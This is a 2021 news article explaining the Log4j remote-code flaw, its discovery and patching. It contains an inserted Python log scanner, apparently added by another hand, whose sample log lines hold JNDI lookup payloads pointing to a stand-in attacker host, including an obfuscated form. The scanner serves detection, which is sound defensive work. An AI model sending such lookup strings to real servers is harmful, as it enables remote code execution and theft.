Internet related News · 2021-12-14

Log4j software security exploit could break the Internet – News

A security flaw in the Java library Log4j is currently being exploited by hackers. The bug lets an attacker make a targeted machine fetch & execute malicious code from a remote server, & since this library is used by almost every Java application running on the Internet & on private Intranets, it’s a serious cause for concern.

What Is Log4j?

Log4j is a logging system which allows software developers to track usage events, software interaction & user communication. Messages are written automatically to a log file (a record of everything that happens in the application). Ceki Gülcü authored the first version of the program for Apache Logging Services, & it’s a project that is part of the Apache Software Foundation. It’s open source code & widely used by software developers, who rely on various libraries to complete repetitive tasks in software development. A developer will build their software for a particular use case on top of a host of libraries, & often this code is accepted as is & not checked for vulnerabilities.

How Can It Be Manipulated?

Log4j includes a bug of a type that is inexcusable in professional software development, & it’s incomprehensible that it’s been left to run at all, particularly for this long. The bug allows a user to write an unfiltered “string” (text) containing a remote address to the log file. The address is then treated by the system as an acceptable source of code, & the hacker can then run almost any software automatically on the system to steal data, change the execution or, well, use your imagination, because it’s that serious & that bad. The real question here is how this could have happened in the first place: filtering data for malicious content is lesson 101 for any software developer.
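The mechanism described above, a lookup string written into a log entry that points at a remote address, can be spotted in request logs while patching is still under way. The following is an added Python example, not code from the original article or from the Log4j project: it collapses the nested lookup syntax that Log4j itself expands (so simple obfuscation does not hide the lookup) and flags lines that carry a JNDI lookup. The log lines and host names are constructed placeholders.

```python
import re

# Constructed sample web-server log lines (not from the article); the host
# names and addresses are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [14/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [14/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [14/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:ldap}://attacker.example/a}"',
    '10.0.0.8 - - [14/Dec/2021:10:01:05 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

# Innermost ${...} expression: a body with no further $, { or } inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once the surrounding obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(m):
    """Evaluate one innermost lookup the way Log4j's substitution would.
    Only the case-changing lookups and the ':-' default-value syntax are
    modelled; a jndi lookup or an unknown one is left untouched."""
    body = m.group(1)
    name, sep, arg = body.partition(":")
    key = name.strip().lower()
    if key == "jndi":
        return m.group(0)          # keep the dangerous lookup visible
    if sep and key == "lower":
        return arg.lower()
    if sep and key == "upper":
        return arg.upper()
    if ":-" in body:               # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    return m.group(0)              # unknown lookup: leave as-is


def normalize_lookups(text):
    """Repeatedly resolve innermost lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _INNER.sub(_resolve_one, text)
    return text


def find_lookup_attempts(lines):
    """Return (line_number, normalized_line) for every line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits
```

Running `find_lookup_attempts(SAMPLE_LOG_LINES)` flags lines 2 and 3 (the obfuscated one collapses to the same `${jndi:ldap://...}` form) and leaves the harmless `${date:yyyy}` line alone.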

How Was It Discovered?

The vulnerability was first discovered by Alibaba’s security team. Subsequently, Minecraft discovered hackers manipulating their system via its chat software. The alert went viral & warnings were issued by the US Government’s cybersecurity agency, Microsoft Corp & Cisco Inc, to name a few.

Who Is Affected by Log4j?

Millions of servers, if not billions, across the globe use this library. Hackers such as professional crypto-miners & those running DDoS botnets are delighted. Companies such as Apple, Tesla, IBM, Microsoft, Steam, Twitter, Baidu & Cloudflare are all affected. Millions of small & medium sized businesses could also be at risk.

What Should You Do If You Think You’re Affected?

The Apache Software Foundation has issued a bug fix & has urgently advised all users to upgrade to the patch they’ve supplied. However, millions of smaller enterprises who use the code may not even be aware of the problem, or may not realize that their system uses Log4j. For a detailed technical analysis of the issue & how to address it, see Naked Security.
